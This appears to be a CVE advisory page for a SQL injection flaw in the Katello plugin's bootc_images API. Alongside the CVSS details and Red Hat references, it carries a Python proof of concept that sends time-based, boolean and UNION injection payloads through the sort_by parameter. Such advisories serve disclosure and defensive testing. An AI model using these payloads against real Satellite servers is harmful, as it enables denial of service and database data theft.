Security Vulnerability Report

CVE-2026-4324 (CVSS 5.4, MEDIUM)

Published: 2026-03-17 14:16:20
Last Modified: 2026-03-27 00:16:24

Description

A flaw was found in the Katello plugin for Red Hat Satellite. This vulnerability, caused by improper sanitization of user-provided input, allows a remote attacker to inject arbitrary SQL commands into the sort_by parameter of the /api/hosts/bootc_images API endpoint. This can lead to a Denial of Service (DoS) by triggering database errors, and potentially enable Boolean-based Blind SQL injection, which could allow an attacker to extract sensitive information from the database.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Katello plugin for Red Hat Satellite (affected versions not explicitly listed; refer to the Red Hat security advisories)
Red Hat Satellite 6.x (the specific affected versions are given in RHSA-2026:5968 and RHSA-2026:5970)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2026-4324 PoC - SQL Injection in Katello sort_by parameter
# Target: Red Hat Satellite with Katello plugin


def exploit_cve_2026_4324(target_url, username, password):
    """
    Exploit SQL Injection in /api/hosts/bootc_images endpoint via sort_by parameter
    """
    # Login to get session
    login_url = f"{target_url}/api/users/login"
    session = requests.Session()

    # Login payload
    login_data = {
        'username': username,
        'password': password
    }

    try:
        login_resp = session.post(login_url, json=login_data, verify=False, timeout=10)
        if login_resp.status_code != 200:
            print(f"[-] Login failed: {login_resp.status_code}")
            return False
        print("[+] Login successful")

        # SQL Injection test payloads
        payloads = [
            "1; SELECT pg_sleep(5)--",
            "1' OR '1'='1",
            "1' UNION SELECT NULL--",
            "1; SELECT current_database()--"
        ]

        api_endpoint = f"{target_url}/api/hosts/bootc_images"

        for payload in payloads:
            print(f"[*] Testing payload: {payload}")
            params = {'sort_by': payload}
            try:
                resp = session.get(api_endpoint, params=params, verify=False, timeout=15)
                # Check for SQL error indicators
                if 'error' in resp.text.lower() or resp.elapsed.total_seconds() > 5:
                    print(f"[+] Potential vulnerability detected with payload: {payload}")
                    print(f"[+] Response time: {resp.elapsed.total_seconds()}s")
                    return True
            except requests.exceptions.RequestException as e:
                print(f"[-] Request error: {e}")
                return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

    # No payload produced an error or a delayed response
    return False


if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>")
        print(f"Example: python {sys.argv[0]} https://satellite.example.com admin password")
        sys.exit(1)

    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    exploit_cve_2026_4324(target, user, pwd)
```

Weakness: CWE-89 (SQL Injection)
NVD status: Awaiting Analysis

References

https://access.redhat.com/errata/RHSA-2026:5968
https://access.redhat.com/errata/RHSA-2026:5970
https://access.redhat.com/security/cve/CVE-2026-4324
https://bugzilla.redhat.com/show_bug.cgi?id=2448349